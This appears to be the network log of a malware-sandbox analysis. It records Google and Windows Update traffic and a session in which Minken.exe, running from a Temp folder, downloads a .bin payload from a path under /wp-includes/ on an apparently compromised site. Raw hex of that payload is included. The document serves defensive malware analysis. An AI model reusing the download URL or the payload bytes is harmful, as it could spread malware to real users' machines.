2024-05-02 13:06:01 UTC	738	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGLifzrEGIjAtAotW97xiDhn6fwnyvQS7r43dpv7E1GI8YkXR8lHG-pScMOWVMJEg8fQ1Eg1M3M4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-02-13; NID=513=XfXV4_tsLPb6EjW6TVfsKn-ZgtB4UhCNxFBqj-b0yxPVScwjuwN2NcTb1-gHst4PYm3HzPo4t9ndFw7SoXtrkpmSxptWu7n5PzzOZ3Qf57iMOVZNeg_M3XDxL2A5O6ZgR-iNgDFm06y0Qis0KL_8PqzkuJMzAVPq5gZ28u_0vPQ
2024-05-02 13:06:01 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 02 May 2024 13:06:01 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3113 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 13:06:01 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-05-02 13:06:01 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 39 4a 49 43 59 4b 61 58 65 39 31 52 44 58 50 56 49 54 2d 77 50 73 34 65 58 6a 48 46 52 69 6e 70 5f Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="9JICYKaXe91RDXPVIT-wPs4eXjHFRinp_
2024-05-02 13:06:01 UTC	959	IN	Data Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-05-02 13:06:12 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T7KOr9ydN2KLoTb&MD=zvmYUGVF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-02 13:06:12 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: c5e3b61d-0ca1-45cf-ba44-3da1f771af06 MS-RequestId: fd230e1a-ea2e-4116-93df-65725a874041 MS-CV: gfoKTQzY20mUFgcZ.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 02 May 2024 13:06:12 GMT Connection: close Content-Length: 24490
2024-05-02 13:06:12 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-02 13:06:12 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49752	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-05-02 13:06:53 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=T7KOr9ydN2KLoTb&MD=zvmYUGVF HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-02 13:06:53 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 3294568b-358f-4d3d-b80e-51fe47b92b54 MS-RequestId: 50c615e4-8770-4d0d-a280-85bff41ac0ac MS-CV: fNecUIMe0ECBsRpN.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 02 May 2024 13:06:52 GMT Connection: close Content-Length: 25457
2024-05-02 13:06:53 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-02 13:06:53 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49755	104.21.31.110	443	2212	C:\Users\user\AppData\Local\Temp\Minken.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 13:07:26 UTC	200	OUT	GET /wp-includes/pLykMdE/ZIbbdBq101.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: thequirkyartman.co.uk Cache-Control: no-cache
2024-05-02 13:07:27 UTC	676	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 13:07:27 GMT Content-Type: application/octet-stream Content-Length: 268352 Connection: close Last-Modified: Thu, 02 May 2024 03:48:35 GMT ETag: "41840-617707a43843c" CF-Cache-Status: BYPASS Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unGW9%2BN3fEcjqZC6fa5c9xsLJu4fr1WkLKbc93cLus65TtdNYDGcanjYrAKGeZM6LdvCGNybfzoE0vttIeHaxET7Z72PTe98dMC%2FbTQlhoykd%2FoWJlaTq1P%2FIEsfKEF5zvAoPpVv2Qw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87d83bfdeb33439c-EWR alt-svc: h3=":443"; ma=86400
2024-05-02 13:07:27 UTC	693	IN	Data Raw: 12 14 80 18 82 97 83 9c 45 90 b7 2e 59 c0 90 a0 1a b9 a2 d7 3e 55 1e 59 18 ea 95 2e 01 7e df 90 68 1e a3 c5 19 f0 91 3c c5 7f 08 a1 92 c9 56 83 4c 9e b0 9e 85 1b c0 42 81 9c 6e 34 99 30 f2 bf 9e 83 5b e0 c9 c3 c7 a1 cc 1b 0f c3 bf 45 da e4 d7 4e 6a cc fe 1b a6 9b bd 8e d6 aa 41 93 95 75 1d 72 0a 4e f9 4e a9 fd ea db 12 a5 de e6 20 50 b5 64 e1 76 06 e6 61 57 1f 0d e1 bf 1b 67 02 fe 79 48 c2 3a cb 85 4a 4f 17 38 2b 86 02 0a cb c9 e4 33 20 d6 2e eb ae 02 60 df 2e 36 2b 3a 40 5d b8 13 6e b2 24 f9 e5 bf 80 2f 67 52 f8 c3 af d8 85 c8 81 36 1c 04 59 83 a8 b9 66 d7 f9 36 2e 90 40 4e c4 3e ea b3 ff 7b 56 63 c0 59 ef 37 f9 dd 2b 54 13 e8 d0 30 e9 00 f8 d9 72 39 35 75 9d 91 da ff 79 f8 a0 49 a8 42 ce 51 fa c4 9e 79 dc 1b 3c 4e aa ea 31 ae af 56 74 98 39 af 4f 26 70 Data Ascii: E.Y>UY.~h<VLBn40[ENjAurNN PdvaWgyH:JO8+3 .`.6+:@]n$/gR6Yf6.@N>{VcY7+T0r95uyIBQy<N1Vt9O&p
2024-05-02 13:07:27 UTC	1369	IN	Data Raw: 58 9c 96 ac 87 e9 89 b0 b6 41 c7 8d a2 17 c9 35 3b 79 2e 20 e3 a7 fd f4 b9 89 c5 7f bf 9c 1f 07 8e 19 f0 0d 93 b5 30 00 77 39 e9 94 e9 41 e1 45 c7 65 c3 69 f7 a8 e8 88 07 b1 f8 16 f8 4d ae f8 1f 70 2a cb 6d 4d b2 9c 4a cc 0d 9b 47 56 b8 6c 50 2f 9b 72 ab 4c d7 59 19 aa f2 76 4f 64 83 c2 57 12 31 ce d9 87 88 2f 0b 20 53 c2 df 07 fa ce 0e d1 1e f5 48 1f de f5 7d 7a 27 88 07 33 9f 2f 90 29 b2 6c 43 8c 35 f4 59 61 f7 bd 89 24 b4 b8 d4 bb 37 89 a3 7f af be 89 4d 33 48 27 36 59 17 90 b1 c5 d1 20 3c af cd b4 a0 dd 76 f5 06 01 a8 a4 2f 4e 88 14 b4 c0 48 73 ea 93 a5 c5 00 13 b6 98 0b 48 f6 13 d4 af 0c 34 94 f5 78 68 e0 49 e9 a7 d4 0a 45 88 d5 50 20 c8 87 f8 72 3e 2f 90 83 df e0 4c 39 82 2d 13 4f ec c8 e0 f6 9f 5a 31 97 be f9 63 f4 ca 8c db e5 73 46 75 1f a1 8c b2 Data Ascii: XA5;y. 0w9AEeiMp*mMJGVlP/rLYvOdW1/ SH}z'3/)lC5Ya$7M3H'6Y <v/NHsH4xhIEP r>/L9-OZ1csFu
2024-05-02 13:07:27 UTC	1369	IN	Data Raw: 19 6f 5f 51 5c 75 82 e1 5b a7 12 ba f6 ae 62 a1 b5 5d e5 f4 ef 3d 81 30 af 83 e9 6d 2d 48 3f 8d e3 ac 7f d6 45 b4 f8 46 22 b9 a9 1e b2 ea ab 59 8b 07 a1 f6 6e 5a 4c 8a bf a2 a2 16 18 00 3a 27 5d db e7 83 b7 fc 2a ed e6 f7 15 b3 37 40 60 76 09 98 30 4e 52 61 27 ae d5 ca ae df b6 5e 5e 73 4e b0 75 c5 1d ab e9 21 58 26 b4 82 3d 0a 81 49 db 70 72 3f f7 d3 93 5f 4a fa 58 9c 96 ac 87 e9 89 b0 b6 41 c7 8d a2 17 c9 35 3b 79 2e 20 e3 a7 fd f4 b9 89 c5 7f bf 9c 1f 07 8e 19 f0 0d 93 b5 30 00 77 39 e9 94 e9 41 e1 45 c7 65 c3 69 f7 a8 e8 88 07 b1 f8 16 f8 4d ae f8 1f 70 2a cb 6d 4d b2 9c 4a cc 0d 9b 47 56 b8 6c 50 2f 9b 72 ab 4c d7 59 19 aa f2 76 4f 64 83 c2 57 12 31 ce d9 87 88 2f 0b 20 53 c2 df 07 fa ce 0e d1 1e f5 48 1f de f5 7d 7a 27 88 07 33 9f 2f 90 29 b2 6c 43 Data Ascii: o_Q\u[b]=0m-H?EF"YnZL:']7@`v0NRa'^^sNu!X&=Ipr?_JXA5;y. 0w9AEeiMpmMJGVlP/rLYvOdW1/ SH}z'3/)lC
2024-05-02 13:07:27 UTC	1369	IN	Data Raw: 73 a6 7c c0 8f 5e 69 a0 b6 d3 07 4b dd 11 8b 45 bc 9b 1e d9 b0 df 32 e3 d8 cf b9 b0 dc 93 da 88 47 43 93 67 03 62 68 fd 25 ee 37 6f fe ea 66 e0 75 07 8c 04 0e 56 b3 41 a0 01 ba 8e ab d4 3e 29 1e ed 16 23 58 cd 5d 82 03 4b f2 fd 0d 61 90 47 66 09 20 72 57 3a 88 9d 33 e7 2c 95 e2 26 0b 74 d6 31 fe 79 3e 66 da 6d 06 13 70 6c e9 16 1f 02 94 4a 40 cc e9 19 68 70 e6 c9 19 6f 5f 51 5c 75 82 e1 5b a7 12 ba f6 ae 62 a1 b5 5d e5 f4 ef 3d 81 30 af 83 e9 6d 2d 48 3f 8d e3 ac 7f d6 45 b4 f8 46 22 b9 a9 1e b2 ea ab 59 8b 07 a1 f6 6e 5a 4c 8a bf a2 a2 16 18 00 3a 27 5d db e7 83 b7 fc 2a ed e6 f7 15 b3 37 40 60 76 09 98 30 4e 52 61 27 ae d5 ca ae df b6 5e 5e 73 4e b0 75 c5 1d ab e9 21 58 26 b4 82 3d 0a 81 49 db 70 72 3f f7 d3 93 5f 4a fa 58 9c 96 ac 87 e9 89 b0 b6 41 c7 Data Ascii: s\|^iKE2GCgbh%7ofuVA>)#X]KaGf rW:3,&t1y>fmplJ@hpo_Q\u[b]=0m-H?EF"YnZL:']*7@`v0NRa'^^sNu!X&=Ipr?_JXA
2024-05-02 13:07:27 UTC	1369	IN	Data Raw: 95 18 3e 87 67 a4 fd cd 3f 5a 2f 90 ac 75 d1 5d 78 bf 1e d1 f0 1f 89 78 1b 6d 4f a2 85 e9 6c a8 9d 1f bc 0a 8c 34 b5 ba a6 0e a7 8b 06 cd bc ba 84 74 e0 f9 b8 84 f3 11 4d 0c bc f7 fb 4a ad c2 3a 06 8a 29 6a ad 01 ca 4a 0a 45 d9 1c 8d 10 1d 69 fd 36 b0 75 8d 36 f8 02 75 30 62 fe 8f b3 20 d8 e9 d7 e4 d7 a1 95 5a 66 94 c1 0c 2f 0b 64 15 d6 f1 ec 9a e6 7a 55 99 8b 98 73 a9 30 02 c6 2b 9c 49 35 d2 07 4b 9e 9a 48 60 bb 9b 1e 59 c9 da 7a 60 10 37 f9 c5 dd d0 5b 73 92 79 93 67 7f 84 e9 04 b5 ab 37 6f 8b ba 69 b7 b5 c0 c9 e4 78 92 af 90 67 44 5e 44 85 67 0a 4f d9 a8 fe 19 58 ab 52 54 46 a1 94 f2 db 24 62 cc 2b 05 d3 7d 29 7f 68 fb b8 a2 d4 f3 ed f0 0a 87 d9 4f bb 91 58 69 0c 2c 0e e0 7f 12 ac e6 40 5c f2 45 96 8d f9 7f e1 31 fe 92 92 8a 02 92 e3 4c da e1 5b 2a 5b Data Ascii: >g?Z/u]xxmOl4tMJ:)jJEi6u6u0b Zf/dzUs0+I5KH`Yz`7[syg7oixgD^DgOXRTF$b+})hOXi,@\E1L[*[
2024-05-02 13:07:27 UTC	1369	IN	Data Raw: d2 6e d3 ce 0d 88 d2 6f a6 fa e6 5a f6 50 42 81 e2 14 61 16 98 28 0d 17 db 0e 5f 83 3b 6b d9 48 92 bf d1 09 a8 5a 0a 34 27 2a 0a d9 22 c6 93 28 52 6e 91 68 cd 37 32 95 00 7d 9d 64 1b b0 16 be bb d5 a9 8c 04 5b 9d fb 39 f8 26 68 05 9e c1 ba 62 21 8f a5 85 fd 3d 06 77 b7 11 17 fa e2 1d 08 ae 74 87 7a 03 b3 ae da 30 f2 48 6b e1 25 73 ea 9f c5 74 16 08 a5 46 f1 cd a4 d4 99 c7 ea 0b f1 a8 e4 2e 3d 31 5a 93 62 31 99 3f 64 2d a3 0b 32 d9 c5 69 af 49 70 78 fd 92 83 46 94 ac ed 86 08 c9 61 2f e8 60 ce e6 99 90 70 fb b3 9e d7 50 36 cd fb ff b1 93 a3 79 dd 68 fa 7f 08 b1 84 23 24 99 8f ba 52 0d 0d b2 bc 84 6a de 02 c3 50 98 80 58 8f 19 4e df f6 3f 94 2e d2 50 ae 66 5c d4 2b f5 66 2f 56 3e f3 52 7a b4 e8 29 b6 f0 ba e6 7a d0 02 c6 98 73 1c 52 c0 8f 5e d0 46 b6 d3 07 Data Ascii: noZPBa(_;kHZ4'*"(Rnh72}d[9&hb!=wtz0Hk%stF.=1Zb1?d-2iIpxFa/`pP6yh#$RjPXN?.Pf\+f/V>Rz)zsR^F
2024-05-02 13:07:27 UTC	1369	IN	Data Raw: cf 70 ce e7 d8 57 85 57 00 60 bb 9d 1a 1d 72 42 3b 04 ca 60 89 e2 53 9e 9b 46 e4 20 50 f3 e5 1a 41 1e e6 61 2a 05 b4 d7 a7 a3 67 29 35 cf fc d2 9e 61 c6 a2 43 dc 82 a7 ce 9d a6 83 e2 0e 83 06 2d 11 78 71 d9 3f b2 0e ef f5 54 2e 32 5c 08 c6 d8 48 41 d8 a4 58 cd 8e 76 be 8c fc b0 61 ea 19 68 c2 06 d6 cf 73 46 99 e4 22 bb 4a b4 39 0c 75 0d f3 9a 0a 7f 80 00 74 6b 28 55 15 ec f0 1a a4 18 28 dd 82 36 e2 7f d8 ca 22 dd 71 a1 eb 98 a7 08 1f ea cd 30 67 3d b0 ac a3 65 69 82 52 c3 2f a7 ce 51 50 3c 24 8d ff 2a 4f d8 8e ee d5 78 a1 dc 6a 94 85 0e a8 59 11 14 11 ac 2b d5 81 84 65 06 16 7e 68 35 67 81 61 dd ba 62 60 b7 6b 85 7d 3c 3d cf 15 d6 88 02 50 60 6d cc f3 79 17 58 01 ec 35 13 18 42 15 03 61 93 a0 c7 09 f1 ad 84 13 fd 6d de aa 43 1b f9 7a d5 26 fc 2d e3 73 e1 Data Ascii: pWW`rB;`SF PAag)5aC-xq?T.2\HAXvahsF"J9utk(U(6"q0g=eiR/QP<$OxjY+e~h5gab`k}<=P`myX5BamCz&-s
2024-05-02 13:07:27 UTC	1369	IN	Data Raw: bb 2e 1c 20 4e af b8 74 98 65 83 5f 25 b9 23 f5 b3 6b 28 e5 10 f4 be d6 38 fa 22 7c 78 88 0e 6b ea c6 ed bc ca 8e b8 7e 61 fb f8 8f 22 24 bd e8 8c 12 80 30 47 f0 fa 6f 58 b0 dc c2 cd c4 4e d5 cd 93 2e 58 5a 60 01 a2 00 f8 49 77 7c 02 c1 1c d0 8b a9 2f 2e f3 2e 58 7f a5 7f 1f 78 62 dc 18 e4 9e 5d 15 7c 3a be 27 e0 53 be 2e 47 ed a3 cc 43 b5 66 a6 bb 1b 5e 5a 6a ee 48 a0 d8 25 5b 2f 62 94 55 a0 bd 32 75 1d 72 37 e9 f9 4e a9 f2 a5 1d 58 d0 2b 5d ac 57 b5 64 59 49 c3 c3 22 a0 f4 cc 1b ba 28 bd c3 15 68 54 a2 41 26 ba 36 8e 8c e1 0c ca cf a0 e1 9d 8e be c7 e3 a4 12 c9 70 01 0a d8 55 4a 54 13 a4 cc 33 0c d8 4b ce 68 9b d5 b2 b1 3f e6 8c fc 9e d1 a1 ea d6 cf 08 54 89 0d 86 36 92 f9 36 21 15 c8 4e cd 9e 69 dd 92 88 6b e8 a4 27 9b 57 26 cf 33 e5 03 ec 04 53 58 32 Data Ascii: . Nte_%#k(8"\|xk~a"$0GoXN.XZ`Iw\|/..Xxb]\|:'S.GCf^ZjH%[/bU2ur7NX+]WdYI"(hTA&6pUJT3Kh?T66!Nik'W&3SX2
2024-05-02 13:07:27 UTC	1369	IN	Data Raw: ba 35 0d b2 43 10 2f 6e 16 ac 38 ac de cd b2 72 92 8f 2d 52 c7 7c c3 b3 4f 27 8b c0 5b 78 b2 06 46 65 5a 6a b9 cd 82 6b 22 b8 17 8d 16 cc ce 65 66 41 ea d1 1f 84 be d8 be 3c 39 1b 6b 84 24 10 12 43 3a 51 4e 99 17 bc 15 6d f0 c9 40 46 07 5f fb d6 af 74 72 d5 82 45 a3 30 ce c6 03 1e 42 e7 be 4c 63 d5 b7 44 87 c4 62 4c f5 6c ce 96 3f 9c e9 82 03 1f e7 63 77 2b e4 31 ff 82 d8 23 3f 90 f4 89 d9 9a 77 5c 99 7a df ed 4f 3d 2b ac a0 75 70 e0 94 d5 6f f5 3f b4 ff 07 46 15 e6 3b fa 77 fa b0 be 2a f0 48 67 a4 5c b7 14 ef 7f 30 fe eb a1 e4 bd 60 6a 0d 60 52 e8 2b 19 28 f8 7e cb f6 33 2a e3 f6 fa 4c 0f 55 f0 17 b8 b8 0a f3 7d 72 4c 0e 28 a2 05 1f 78 62 a0 34 1f 24 47 ac 0d 8b e3 d3 61 9d 0c 81 ec 30 48 0d b9 8f a0 7c 0f fb 78 14 b8 94 21 44 4d 25 5b 95 33 ea 03 a0 03 Data Ascii: 5C/n8r-R\|O'[xFeZjk"efA<9k$C:QNm@F_trE0BLcDbLl?cw+1#?w\zO=+upo?F;wHg\0`j`R+(~3LU}rL(xb4$Ga0H\|x!DM%[3
